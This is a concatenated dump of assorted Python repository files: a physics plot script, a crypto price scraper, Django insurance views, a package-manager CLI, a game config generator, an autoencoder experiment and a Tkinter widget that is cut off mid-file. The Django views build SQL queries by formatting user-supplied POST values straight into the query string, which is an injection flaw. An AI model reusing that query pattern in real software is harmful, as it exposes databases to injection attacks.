plt.plot(T_range, linear(T_range, *popt), color = color_set_plot[Nc])\n\n A[Nc] = popt[0]\n B[Nc] = popt[1]\n DA[Nc] = pcov[0,0]\n DB[Nc] = pcov[1,1]\n\n Nc += 1\n\n\n\n#calculation of Tc (r,g,b)\nprint(\"#################\")\nprint(\"Tc from red and green:\")\nprint(Temp(A[0],A[1],B[0],B[1]),\"±\",DTemp(A[0], A[1], B[0], B[1], DA[0], DA[1], DB[0], DB[1]))\n\"\"\"\"\"\"\"\"\"\nprint(\"Tc from red and blue:\")\nprint(Temp(A[0],A[2],B[0],B[2]),\"±\",DTemp(A[0], A[2], B[0], B[2], DA[0], DA[2], DB[0], DB[2]))\nprint(\"#################\")\nprint(\"Tc from blue and green:\")\nprint(Temp(A[2],A[1],B[2],B[1]),\"±\",DTemp(A[2], A[1], B[2], B[1], DA[2], DA[1], DB[2], DB[1]))\n\"\"\"\"\"\"\"\"\"\"\"\n\n\nplt.legend(loc = 'upper right')\nplt.title(\"Binder Cumulant plot\")\nplt.show()\n","repo_name":"tolios/ising2dnn","sub_path":"programms/binder.py","file_name":"binder.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35322947995","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nfrom time import sleep\nfrom tqdm import tqdm, trange\n\n# new string\nprint('')\n\nfor i in trange(100, colour='#66ff00', desc='Parsing'):\n sleep(.06)\n\ndef parse_btc():\n url = 'https://coinmarketcap.com/currencies/bitcoin/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n btc = soup.find('div', class_='priceValue')\n print(btc.text)\n\ndef parse_eth():\n url = 'https://coinmarketcap.com/currencies/ethereum/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n eth = soup.find('div', class_='priceValue')\n print(eth.text)\n\ndef parse_ltc():\n url = 'https://coinmarketcap.com/currencies/litecoin/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n ltc = soup.find('div', class_='priceValue')\n print(ltc.text)\n\ndef parse_trx():\n url = 'https://coinmarketcap.com/currencies/tron/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n trx = soup.find('div', class_='priceValue')\n print(trx.text)\n\ndef parse_bnb():\n url = 'https://coinmarketcap.com/currencies/bnb/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n bnb = soup.find('div', class_='priceValue')\n print(bnb.text)\n\ndef parse_xrp():\n url = 'https://coinmarketcap.com/currencies/xrp/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n xrp = soup.find('div', class_='priceValue')\n print(xrp.text)\n\ndef parse_sol():\n url = 'https://coinmarketcap.com/currencies/solana/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n sol = soup.find('div', class_='priceValue')\n print(sol.text)\n\ndef parse_doge():\n url = 'https://coinmarketcap.com/currencies/dogecoin/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n doge = soup.find('div', class_='priceValue')\n print(doge.text)\n\ndef parse_ada():\n url = 'https://coinmarketcap.com/currencies/cardano/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n ada = soup.find('div', class_='priceValue')\n print(ada.text)\n\ndef parse_dot():\n url = 'https://coinmarketcap.com/currencies/polkadot-new/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n dot = soup.find('div', class_='priceValue')\n print(dot.text)\n\n\ndef output():\n print('BTC:') \n parse_btc()\n\n print('\\nETH:') \n parse_eth()\n\n print('\\nLTC:')\n parse_ltc()\n\n print('\\nTRX:')\n parse_trx()\n\n print('\\nBNB:')\n parse_bnb()\n\n print('\\nXRP:')\n parse_xrp()\n\n print('\\nSOL:')\n parse_sol()\n\n print('\\nDOGE:')\n parse_doge()\n\n print('\\nADA:')\n parse_ada()\n\n print('\\nDOT:')\n parse_dot()\n \n # new str \n print('')\n\noutput() ","repo_name":"johnebon/CryptoParser","sub_path":"parse_crypto.py","file_name":"parse_crypto.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71187324946","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.db import connection\nfrom .forms import PolisForm\nfrom .models import Polis, Service\nimport json\nfrom django.http import JsonResponse\nfrom django.contrib import messages \n\n\n\n# Create your views here.\ndef main_view(request):\n cursor = connection.cursor()\n command = \"\"\" select sk_name from ensurance_polis\"\"\"\n cursor.execute(command)\n sk_names = cursor.fetchall()\n sk_names_filtred = []\n for i in sk_names: #заполняем поле с названиями СК\n target = str(i[0]).lstrip(\"('\").rstrip(\"',)\")\n if target in sk_names_filtred: pass\n else: sk_names_filtred.append(target)\n\n \n return render(request, 'main.html', {'sk_names_filtred':sk_names_filtred})\n\ndef search_services(request):\n if request.method == \"POST\":\n search_text = request.POST['search_text']\n else:\n search_text = \"\"\n \n services = Service.objects.filter(name__icontains=search_text)\n \n return render (request, 'ajax_search.html', {'services':services})\n\n\ndef ajax_view(request):\n cursor = connection.cursor()\n command = \"\"\" select sk_name from ensurance_polis\"\"\"\n cursor.execute(command)\n sk_names = cursor.fetchall()\n sk_names_filtred = []\n for i in sk_names: #заполняем поле с названиями СК\n target = str(i[0]).lstrip(\"('\").rstrip(\"',)\")\n if target in sk_names_filtred: pass\n else: sk_names_filtred.append(target)\n if request.method==\"POST\": #валидность формы сделана в js\n polis_id = request.POST['polis_id'] #\n #inp_value = request.POST.get('chosenQuestions', 'This is a default value') #получаем из ajax, в хтмл это скрытая форма\n #print(polis_id, inp_value)\n cursor = connection.cursor()\n command = \"\"\" select * from ensurance_polis where id = '%s'\"\"\" %(polis_id) #получаем кортеж в списке в котором все ��анные из БД по айди полиса[( , , , )]\n cursor.execute(command)\n result = cursor.fetchall()\n in_services = result[0][5].split() #сервисы включенные в этот полис_ид\n out_services = result[0][6].split() #сервисы невключенные в этот полис_ид\n inp_value = request.POST.get('chosenQuestions', 'This is a default value') # получаем сервисы, которые выбраны\n print('inp', inp_value)\n inp_value_list = []# складируется все, что написано в поиске услуг\n if inp_value != '':\n inp_value = tuple(inp_value.split(',')) # в переменной лежат названия услуг, форматируем их чтобы узнать айди\n if len(inp_value) == 1: #чистим, если одно значение в кортеже, чтобы не было лишних символов\n inp_value = str(inp_value)\n inp_value = inp_value.replace(',','')\n print(inp_value)\n inp_value_list.append(inp_value.lstrip(\"('\").rstrip(\"',)\"))#ненавижу запятые\n elif len(inp_value) > 1:\n for elem in inp_value:\n print(elem)\n inp_value_list.append(elem)\n #тут тоже чистим - просто добвляем в лист\n\n command2 = \"\"\" select id, name from ensurance_service where name in {}\"\"\".format(inp_value) # получаем айди выбранных сервисов\n cursor.execute(command2)\n services_included = cursor.fetchall() # получаем [(id, name), (id, name), ...]\n print(inp_value_list, '0')\n services_chosen_ids = [] #сюда получаем [[id, name], [id, name], ...]\n services_included_html = []# все услуги которые включ, передаем в рендер\n services_excluded_html = []# все услуги которые выключ, передаем в рендер\n #services_unknown_html=[]# все что осталось, передаем в рендер\n for elem in services_included: # чистим айди и название услуги от лишних знаков\n local_dict = [elem[0], elem[1]]\n services_chosen_ids.append(local_dict) \n\n for j in services_chosen_ids: \n if j[1] in inp_value_list: #если есть совпадения из БД они удаляются, остается только то, чего нет в БД\n inp_value_list.pop(inp_value_list.index(j[1]))\n else:pass\n for i in services_chosen_ids: # проверяем на вхождение в ин_сервисес и выводим в штмл\n service_id = str(i[0])\n try: #делим услуги на включ/ не включ\n in_services.index(service_id)\n services_included_html.append(i[1])\n print(i[1], 'Включено')\n except:\n services_excluded_html.append(i[1])\n print(i[1], 'Не включено')\n print(inp_value_list, services_included_html, services_excluded_html)\n return render(request, 'polis_search.html', {'result':result, 'inp_value_list':inp_value_list, \"sk_names_filtred\":sk_names_filtred,'services_included_html':services_included_html, 'services_excluded_html':services_excluded_html})\n else:\n error_text_1 = 'Проверьте выбранные услуги и попробуйте заново'\n return render(request, 'polis_search.html', {'error_text_1':error_text_1, 'sk_names_filtred':sk_names_filtred})\n","repo_name":"jorjorjor1/med","sub_path":"project/apps/ensurance/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4084365431","text":"import os\nimport sys\nimport typing\nimport subprocess\nfrom pathlib import Path\nimport argparse\nimport shutil\nimport argcomplete\nfrom psprint import print\nfrom . import CONFIG\nfrom .config import MetaConfig\nfrom .classes import InstallEnv\nfrom .tools import timeout\n\n\ndef cli(config: MetaConfig = None) -> argparse.ArgumentParser:\n '''\n Parse command line arguments\n\n Args:\n config: configuration to be modified by command line inputs\n\n Returns:\n modified ``confing``\n\n '''\n config = config or CONFIG\n description = '''\n\n \\033[1;91mNOTICE: This is only intended for \"user\" packages.\n CAUTION: DO NOT RUN THIS SCRIPT AS ROOT.\n CAUTION: If you still insist, I won't care.\\033[m\n '''\n\n\n d_pref = config.data_dir\n parser = argparse.ArgumentParser(\n description=description,\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n # base arguments\n parser.add_argument('--init', action='store_true',\n help='Initialize PSPMan')\n parser.add_argument('--version', action='store_true',\n help='Display version and exit')\n parser.add_argument('-l', '--list', action='store_true', dest='info',\n help='display list of cloned repositories and exit')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='display verbose output')\n parser.add_argument('-s', '--stale', action='store_true',\n help='skip updates, let repositories remain stale')\n parser.add_argument('-o', '--only-pull', action='store_true', dest='pull',\n help='only pull, do not try to install')\n parser.add_argument('-f', '--force-risk', action='store_true', dest='risk',\n help='force working with root permissions [DANGEROUS]')\n parser.add_argument('-p', '--prefix', type=str, nargs='?', metavar='PREF',\n help=f'path for installation [default: {d_pref}]',\n default=d_pref)\n parser.add_argument('-c', '--clone-dir', type=str, nargs='?', default=None,\n metavar='C_DIR', help=f'''Clone git repos in C_DIR.\nPlease check if you want to add this to PATH.\n[default: PREF{os.sep}src]\n''')\n parser.add_argument('-r', '--reset', metavar='PROJ', type=str, nargs='*',\n default=[], help='clean-reset PROJ code')\n parser.add_argument('-d', '--delete', metavar='PROJ', type=str, nargs='*',\n default=[], help='delete PROJ')\n parser.add_argument('-i', '--install', metavar='URL', type=str, nargs='*',\n default=[],\n help=f'''\nformat: \"URL[___branch[___'only'|___inst_argv[___sh_env]]]\"\n\n* *REMEMBER the QUOTATION MARKS*\n\n* URL: url to be cloned.\n* branch: custom branch to clone. Blank implies default.\n* pull_only: 'true', 'only', 'pull', 'hold' => Don't try to install this URL\n* inst_argv: Custom arguments. These are passed *raw* during installation.\n* sh_env: VAR1=VAL1,VAR2=VAL2,VAR3=VAL3.... Modified install environment.\n\n''')\n parser.set_defaults(call_function=None)\n\n # sub-commands\n sub_parsers = parser.add_subparsers()\n\n version = sub_parsers.add_parser(name='version', aliases=['ver'],\n help='display version and exit')\n version.set_defaults(call_function='version')\n\n switch = sub_parsers.add_parser(\n name='switch', aliases=['activate', 'export'],\n help='switch to environment temporarily\\n' +\n 'with additional *PATH variables from PREFIX')\n switch.add_argument('switch_to', type=str, metavar='GIT_GROUP|PATH',\n help=\"GIT_GROUP's name or path\", nargs='?',\n default='default')\n switch.add_argument('-c', '--copy', action='store_true', dest='clipboard',\n help='try to copy soruce command to clipboard')\n switch.set_defaults(call_function='switch')\n\n unlock = sub_parsers.add_parser(name='unlock', aliases=[],\n help='Unlock C_DIR and exit')\n unlock.set_defaults(call_function='unlock')\n\n list_gits = sub_parsers.add_parser(\n name='list', aliases=['info'],\n help='display list of cloned repositories and exit'\n )\n list_gits.add_argument('--meta', '-m', action='store_true',\n help='List known C_DIR(s)')\n list_gits.set_defaults(call_function='info')\n\n init = sub_parsers.add_parser(name='init', aliases=['initialize'],\n help='initialize pspman')\n init.add_argument('--ignore', '-i', type=str, metavar='DEP', nargs='*',\n help='initialize without dependency DEP')\n init.set_defaults(call_function='init')\n\n goodbye = sub_parsers.add_parser(name='goodbye', aliases=['de-initialize'],\n help='Cleanup before uninstalling pspman')\n goodbye.set_defaults(call_function='goodbye')\n\n return parser\n\n\ndef cli_opts(config: MetaConfig = None) -> typing.Dict[str, typing.Any]:\n '''\n Parse cli arguments to return its dict\n '''\n config = config or CONFIG\n parser = cli()\n argcomplete.autocomplete(parser)\n args = parser.parse_args()\n if args.info:\n setattr(args, 'call_function', 'info')\n if hasattr(args, 'meta'):\n if args.meta:\n setattr(args, 'call_function', 'meta')\n else:\n setattr(args, 'call_function', 'info')\n if args.version:\n setattr(args, 'call_function', 'version')\n if args.init:\n setattr(args, 'call_function', 'init')\n return vars(args)\n\n\ndef perm_pass(env: InstallEnv, permdir: Path) -> int:\n '''\n Args:\n permdir: directory whose permissions are to be checked\n\n Returns:\n Error code: ``1`` if all rwx permissions are not granted\n\n '''\n if env.verbose:\n print(f'Checking permissions for {permdir}')\n while not permdir.exists():\n # clone/prefix directory get be created anew\n permdir = permdir.resolve().parent\n if env.verbose:\n print(f'Checking permissions for the parent: {permdir}')\n user = os.environ.get('USER', 'root')\n stdout, err = subprocess.Popen(['stat', '-L', '-c', \"%U %G %a\", permdir],\n text=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE).communicate()\n if err:\n print('Error checking directory permissions, aborting...', mark=5)\n return 1\n owner, group, octperm = stdout.replace(\"\\n\", '').split(' ')\n if (octperm[-1] == '7') != 0:\n # everyone has access\n return 0\n if (octperm[-2] == '7') != 0:\n # some group has permissions\n stdout, err = subprocess.Popen(['groups', user], text=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE).communicate()\n if err:\n # error\n print('Error checking group permissions, aborting...', mark=5)\n return 1\n user_groups = stdout.split(' ')\n for u_grp in user_groups:\n if u_grp == group:\n return 0\n if (octperm[-3] == '7') != 0:\n # owner has permissions\n if user == owner:\n return 0\n print(f'''\n We [{user}] do not have sufficient permissions [{octperm}]\n on {owner}'s directory: {permdir}\n ''', mark=5)\n print('Try another location', mark=2)\n return 1\n\n\ndef prepare_env(env: InstallEnv) -> int:\n '''\n Check permissions and create prefix and source directories\n\n Returns:\n Error code\n '''\n # Am I root?\n if os.environ.get('USER', 'root').lower() == 'root':\n print('I hate dictators', mark=3)\n if not env.risk:\n print('Bye', mark=0)\n return 2\n print('I can only hope you know what you are doing...',\n mark=3)\n print('Here is a chance to kill me in', mark=2)\n try:\n timeout(10)\n except:\n print(\"Aborting.\", pref_color='g', pref=chr(0x1f197), short=False)\n return 1\n print()\n print(\"Your decision\", pref=chr(0x1f937), pref_color='r',\n text_color=\"y\", short=False)\n print()\n print('Proceeding...', mark=1)\n else:\n # Is installation directory read/writable\n err = perm_pass(env=env, permdir=env.clone_dir)\n err += perm_pass(env=env, permdir=env.prefix)\n if err != 0:\n print('Bye', mark=0)\n return err\n env.clone_dir.mkdir(parents=True, exist_ok=True)\n env.prefix.mkdir(parents=True, exist_ok=True)\n return 0\n\n\ndef lock(env: InstallEnv, unlock: bool = False, message: str = None):\n '''\n Unlock up the directory\n\n Args:\n env: installation context\n unlock: unlock existing locks?\n message: message to be written in the lockfile instead of pid\n\n Returns:\n Error code\n\n '''\n lock_path = env.prefix.joinpath('.proc.lock')\n # lockfile is deliberately human-readable\n\n if lock_path.exists():\n # directory is locked\n if unlock:\n # restore all backup databases\n for filetype in \"healthy\", \"fail\":\n backup_file = env.clone_dir.joinpath(f\".pspman.{filetype}.yml\")\n if backup_file.with_suffix('.yml.bak').is_file() and \\\n not backup_file.is_file():\n backup_file.with_suffix(\".yml.bak\").replace(backup_file)\n temp_build = env.prefix.joinpath('temp_build')\n if temp_build.is_dir():\n shutil.rmtree(temp_build)\n lock_path.unlink()\n return 1\n with open(lock_path, 'r') as lock_fh:\n print(f\"This git-group was locked for safety by {lock_fh.read()}\",\n mark='err')\n print(\"Either wait for the process to get completed\")\n print(\"OR interrupt the process and execute\")\n print(f\"pspman -p {env.prefix} unlock\", mark='act')\n print(\"Interruption WILL generally MESS UP source codes.\", mark='warn')\n return 2\n if unlock:\n print(f'Lockfile {lock_path} not found.')\n return 2\n with open(lock_path, 'w') as lock_fh:\n lock_fh.write(str(message) or 'pid:' + str(os.getpid()))\n return 0\n","repo_name":"pradyparanjpe/pspman","sub_path":"pspman/define.py","file_name":"define.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8373586571","text":"indexnum = 0\n\ncommon = int(input('Common: '))\nuncommon = int(input('Uncommon: '))\nrare = int(input('Rare: '))\nveryrare = int(input('VeryRare: '))\nextremelyrare = int(input('ExtremelyRare: '))\nlegendary = int(input('Legendary: '))\n\ncommonpokes = []\nuncommonpokes = []\nrarepokes = []\nveryrarepokes = []\nextremelyrarepokes = []\nlegendarypokes = []\nrarities = [6000, 5000, 4000, 3000, 2000, 1000]\n\nif common != 0:\n print('Common')\n commonchance = round(rarities[0] / common)\n for i in range(common):\n commonpokes.append(input())\nif uncommon != 0:\n print('Uncommon')\n uncommonchance = round(rarities[1] / uncommon)\n for i in range(uncommon):\n uncommonpokes.append(input())\nif rare != 0:\n print('Rare')\n rarechance = round(rarities[2] / rare)\n for i in range(rare):\n rarepokes.append(input())\nif veryrare != 0:\n print('Very Rare')\n veryrarechance = round(rarities[3] / veryrare)\n for i in range(veryrare):\n veryrarepokes.append(input())\nif extremelyrare != 0:\n print('Extremely')\n extremelyrarechance = round(rarities[4] / extremelyrare)\n for i in range(extremelyrare):\n extremelyrarepokes.append(input())\nif legendary != 0:\n print('Legendary')\n legendarychance = round(rarities[5] / legendary)\n for i in range(legendary):\n legendarypokes.append(input())\n\n\ndef pencil(chance, poke, len):\n global indexnum\n if True:\n for k in range(len):\n print(f' \"{indexnum}\"', '{')\n print(f'\t\t\t\tchance={chance}')\n print(f' reward=\"ITEM:pixelmon:{poke[k]}:0:1\"')\n print(' }')\n indexnum += 1\n\n\nif common != 0:\n print('#Common')\n pencil(commonchance, commonpokes, common)\nif uncommon != 0:\n print('#Uncommon')\n pencil(uncommonchance, uncommonpokes, uncommon)\nif rare != 0:\n print('#Rare')\n pencil(rarechance, rarepokes, rare)\nif veryrare != 0:\n print('#Veryrare')\n pencil(veryrarechance, veryrarepokes, veryrare)\nif extremelyrare != 0:\n print('#Extremelyrare')\n pencil(extremelyrarechance, extremelyrarepokes, extremelyrare)\nif legendary != 0:\n print('#Legendary')\n pencil(legendarychance, legendarypokes, legendary)\n","repo_name":"Ti1mmy/RC-Automation-Scripts","sub_path":"Congiftms.py","file_name":"Congiftms.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73529577427","text":"#!/usr/bin/env python\n\"\"\"\nMain file for Tutorial 4 Part 3.1\nUses an auto-encoder (Autoencoder class) for different experiments\n\nAuthors: Kostis SZ, Romina Arriaza and Clara Tump\n\"\"\"\n\nimport numpy as np\nimport data\nimport plot\nfrom auto_encoder import Autoencoder\n\nnp.random.seed(10)\n\ndef main():\n x_train, y_train, x_test, y_test = data.mnist()\n layer_sizes = [10,100,400,784,900,1000]\n sigmoid_histories = []\n relu_histories = []\n for layer_size in layer_sizes:\n print(\"layer_size: \", layer_size)\n sigm_1run = train(layer_size, 'sigmoid', x_train, x_test)\n relu_1run = train(layer_size, 'relu', x_train, x_test)\n sigmoid_histories.append(sigm_1run)\n relu_histories.append(relu_1run)\n print(\"MSE sigmoid: \", sigm_1run)\n print(\"MSE relu: \", relu_1run)\n print(\"sigmoid histories: \", sigmoid_histories)\n print(\"relu histories: \", relu_histories)\n plot.plot_losses(layer_sizes, sigmoid_histories, relu_histories)\n\ndef train(layer_size, activation, x_train, x_test):\n params = {\n \"epochs\" : 35,\n \"num_hid_nodes\": layer_size,\n \"weight_init\": [0.0, 0.1],\n \"activations\": activation, #relu is much better performance\n \"lr\": 0.15,\n \"verbose\": 0\n }\n auto_enc1 = Autoencoder(**params)\n if layer_size > 784:\n regularization = 0.0001\n else:\n regularization = 0\n history = auto_enc1.train(x_train,x_train, x_test, regularization=regularization)\n # loss = auto_enc1.evaluate(x_test)\n # print(\"history: \", history.history['loss'])\n return history.history['loss']\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"clara2911/ANNProject","sub_path":"Tutorial 4/main_31_relu.py","file_name":"main_31_relu.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"75036541584","text":"try:\n import Tkinter as tk\nexcept ModuleNotFoundError:\n import tkinter as tk\n\nfrom PIL import Image, ImageDraw, ImageFont, ImageTk\nimport sys\nimport math\n\nclass RadialBar(object):\n\n def __init__(self, size=(50,50), width=4, padding=1, title=None, units=None, imgtype='P',\n barcol=0, valuecol=1, fillcol=2, bgcol = 1, outlinecol=1, emptycol=2, titlecol=1,\n font = 'FreeSans.ttf', fontsize=12, antialias=False):\n self._size = (size[0]-1, size[1]-1) # use size as min and max pixel extents\n self.title = title\n self.unit = units\n self.bar_width = width\n self.padding = padding\n self._bar = barcol\n self._text = valuecol\n self._titlecol = titlecol\n self._fill = fillcol\n self._background = bgcol\n self._outline = outlinecol\n self._nobar = emptycol\n self._imgtype = imgtype \n self._isint = True\n self._val = 0.0\n self._minval = 0.0\n self._maxval = 100.0\n self._precision = 1\n self._squareindicator = True\n self._antialias = antialias\n\n self._img = Image.new(imgtype, size)\n self._draw = ImageDraw.Draw(self._img)\n self.set_font(font, fontsize)\n\t\t\n\t\t# Values to support click events for window managers\n self._centre = (self._size[0]/2,self._size[1]/2)\n self._outer_radius = self._centre\n self._inner_radius = ((self._outer_radius[0] - self.bar_width), (self._outer_radius[1] - self.bar_width))\n\n @property\n def bar_col(self):\n return self._bar\n\n @bar_col.setter\n def bar_col(self,val):\n self._bar = val\n\n @property\n def empty_col(self):\n return self._nobar\n\n @empty_col.setter\n def empty_col(self,val):\n self._nobar = val\n\n @property\n def value_col(self):\n return self._text\n\n @value_col.setter\n def value_col(self,val):\n self._text = val\n\n @property\n def title_col(self):\n return self._titlecol\n\n @title_col.setter\n def title_col(self,val):\n self._titlecol = val\n\n @property\n def fill_col(self):\n return self._fill\n\n @fill_col.setter\n def fill_col(self,val):\n self._fill = val\n\n @property\n def background_col(self):\n return self._background\n\n @background_col.setter\n def background_col(self,val):\n self._background = val\n\n @property\n def outline_col(self):\n return self._outline\n\n @outline_col.setter\n def outline_col(self,val):\n self._outline = val\n \n @property\n def size(self):\n return self._img.size\n\n def set_font(self, fontname, size):\n try:\n self._font = ImageFont.truetype(fontname, size)\n except IOError:\n pass\n \n @property\n def title(self):\n return self._title\n\n @title.setter\n def title(self, title):\n if title == '':\n self._title = None\n self._title = title\n\n @property\n def unit(self):\n return self._units\n\n @unit.setter\n def unit(self, units):\n if units is None:\n self._units = ''\n else:\n self._units = units\n\n @property\n def bar_width(self):\n return self._width\n\n @bar_width.setter\n def bar_width(self, width):\n if not isinstance(width, int):\n raise TypeError(\"Width must be an integer\")\n if width < 0:\n raise ValueError(\"Width must be a positive value\")\n self._width = width\n\t\t\n @property\n def padding(self):\n return self._padding\n\n @padding.setter\n def padding(self, pad):\n if not isinstance(pad, int):\n raise TypeError(\"Padding must be an integer\")\n if pad < 0:\n raise ValueError(\"Padding must be a positive value\")\n self._padding = pad\n\n @property\n def value(self):\n return self._val\n\n @value.setter\n def value(self, val):\n self._isint = isinstance(val, int)\n self._val = float(val)\n\n @property\n def precision(self):\n return self._precision\n\n @precision.setter\n def precision(self, points):\n if points < 0:\n raise ValueError(\"Precision must be a positive integer\")\n self._precision = points\n\n def square_indicator(self):\n self._squareindicator = True\n\n def scalable_indicator(self):\n self._squareindicator = False\n \n def set_range(self, minval, maxval):\n if minval > maxval:\n raise ValueError(\"Min value greater than Max value\")\n\n self._minval = float(minval)\n self._maxval = float(maxval)\n\n def define_bounding_area(self):\n # Render title text if a title has been defined\n titleheight = 0\n if not self._title is None:\n w, h = self._font.getsize(self._title)\n titleheight = h + 1 # Add 1px border\n\n x_top = 0\n y_top = titleheight\n x_bottom = self._size[0]\n y_bottom = self._size[1]\n if self._squareindicator:\n # even the sides to appear circular and central\n # Which is the shortest side?\n width = (x_bottom - x_top)\n height = (y_bottom - y_top)\n if width > height: \n # Scale width\n x_top = int(x_top + ((width - height) / 2))\n x_bottom = int(x_bottom - ((width - height) / 2))\n elif height > width:\n # Scale height\n y_top = int(y_top + ((height - width) / 2))\n y_bottom = int(y_bottom - ((height - width) / 2))\n #else they are the same and do nothing\n\n # Add padding\n x_top = x_top + self._padding\n y_top = y_top + self._padding\n x_bottom = x_bottom - self._padding\n y_bottom = y_bottom - self._padding\n self._outer_radius = ((x_bottom - x_top) / 2, (y_bottom - y_top) / 2)\n self._inner_radius = ((self._outer_radius[0] - self.bar_width), (self._outer_radius[1] - self.bar_width))\n return ((x_top,y_top),(x_bottom,y_bottom))\n\n def rendergraph(self, bounds):\n rng = self._maxval - self._minval\n degree = 0\n if (self._val <= self._minval): degree = 0\n elif (self._val >= self._maxval): degree = 360\n else:\n degree = ((self._val - self._minval) * 360) / rng\n\n degree_end = int(degree - 90)\n if degree_end < 0:\n degree_end = 270 + degree\n\n (cw,ch) = (bounds[1][0] - bounds[0][0], bounds[1][1] - bounds[0][1])\n self._centre = ((bounds[0][0]+(cw/2)), (bounds[0][1]+(ch/2))) # Save this for window event detection\n if self._antialias: \n (cw,ch) = (cw*2,ch*2)\n ctlimg = Image.new(self._imgtype, (cw,ch), color=self._background)\n ctldraw = ImageDraw.Draw(ctlimg)\n ctlextents = (ctlimg.width-1, ctlimg.height-1)\n\n # Exception, if zero degrees then skip rendering the bar\n if degree == 0:\n ctldraw.ellipse( ((0,0),ctlextents), fill=self._nobar)\n else: # Render the progress bar\n ctldraw.ellipse( ((0,0), ctlextents), fill=self._bar)\n if not degree == 360:\n # Overwrite the indicator with a pie slice unless it's totally full\n ctldraw.pieslice( ((0,0), ctlextents), degree_end, 270, self._nobar)\n\n # Draw internal ellipse\n barwidth = self._width\n if self._antialias: barwidth = self._width * 2\n ctldraw.ellipse(((barwidth,barwidth),\n (ctlimg.width-barwidth, ctlimg.height-barwidth)),\n fill=self._fill, outline=self._outline)\n\n # Draw final border around external ellipse\n ctldraw.ellipse( ((0,0), ctlextents), fill=None, outline=self._outline)\n\t\t\n # paste image back to main control\n if self._antialias:\n ctlimg = ctlimg.resize((int(ctlimg.width/2), int(ctlimg.height/2)), Image.LANCZOS)\n self._img.paste(ctlimg, (bounds[0][0], bounds[0][1]))\n\t\n def rendertitle(self):\n # render the title text\n if self._title is not None:\n w, h = self._font.getsize(self._title)\n xtxt = int((self._size[0] - w) / 2)\n self._draw.text( (xtxt,0), self._title, fill=self._titlecol, font=self._font)\n\n def rendervalue(self,bounds):\n # Format number as integer or floating point according to defined precision\n txtformat = '{0:.0f}{1}'\n if not self._isint:\n txtformat = '{0:.' + \"{0:d}\".format(self._precision) + 'f}{1}'\n\n # Encode/decode UTF8 dance (needed for such things as degree symbols)\n if sys.version_info[0] < 3:\n txt = txtformat.format(self._val, self._units.encode('utf-8')).decode('utf-8')\n else:\n txt = txtformat.format(self._val, self._units)\n w, h = self._font.getsize(txt)\n\n # render text centrally\n x = bounds[0][0] + (((bounds[1][0] - bounds[0][0]) - w) /2)\n y = bounds[0][1] + (((bounds[1][1] - bounds[0][1]) - h) /2)\n \n self._draw.text( (x,y), txt, fill=self._text, font=self._font) \n\n def render(self):\n 'Render and return a PIL image'\n # Clear background for entire image\n self._draw.rectangle(((0,0),self._size), fill=self._background)\n \n\t\t# Define the drawing area for the control without title and considering\n\t\t# options to maintain aspect\n bounds = self.define_bounding_area()\n\t\t\n\t\t# Draw the radial bar image\n self.rendergraph(bounds)\n\n\t\t# Draw title text\n self.rendertitle()\n\t\t\n\t\t# Draw value and any specified label\n self.rendervalue(bounds)\n\n # Return the rendered image\n return self._img\n \nclass TkRadialBar(tk.Label, RadialBar):\n\tClickStatus = 1\n\tClickProgress = 2\n\tClickBackground = 3\n\t\n\tdef __init__(self, master):\n\t\t# Setup as a full colour control and define default colours to use\n\t\tRadialBar.__init__(self, size=(150,150), font=\"arial.ttf\", fontsize=12, imgtype='RGB', antialias=True)\n\t\ttk.Label.__init__(self, master, bg=\"white\")\n\t\tself.bar_width = 20\n\t\tself.bar_col = (255,0,0)\n\t\tself.empty_col = (255,255,255)\n\t\tself.background_col = (255,255,255)\n\t\tself.outline_col = (0,0,0)\n\t\tself.value_col = (0,0,0)\n\t\tself.title_col = (0,0,0)\n\t\tself.fill_col = (200,200,200)\n\t\tself.set_range(15,40)\n\t\t\n\t\tself.bind(\"\", self.activateclick)\n\t\tself.bind(\"\", self.activateclick)\n\t\tself.bind(\"\", self.activateclick)\n\t\tself.bind(\"\", self.activateclick)\n\t\t\n\t\tself._lastclick = (TkRadialBar.ClickStatus, tk.EventType.ButtonRelease)\n\t\t\n\tdef on_click_status(self, event):\n\t\tpass\n\t\t\n\tdef on_click_progress(self, event):\n\t\tpass\n\t\t\n\tdef activateclick(self, event):\n\t\txdis = self._centre[0] - event.x\n\t\tydis = self._centre[1] - event.y\n\n\t\tlastclick = (TkRadialBar.ClickBackground, event.type)\n\t\t\n\t\ttest = ( math.pow(event.x - self._centre[0],2) / math.pow(self._inner_radius[0],2) ) \\\n\t\t\t+ ( math.pow(event.y - self._centre[1],2) / math.pow(self._inner_radius[1],2) )\n\t\t\t\t\n\t\tif test <= 1:\n\t\t\tif self._lastclick[0] == TkRadialBar.ClickStatus and self._lastclick[1] == tk.EventType.ButtonPress and event.type == 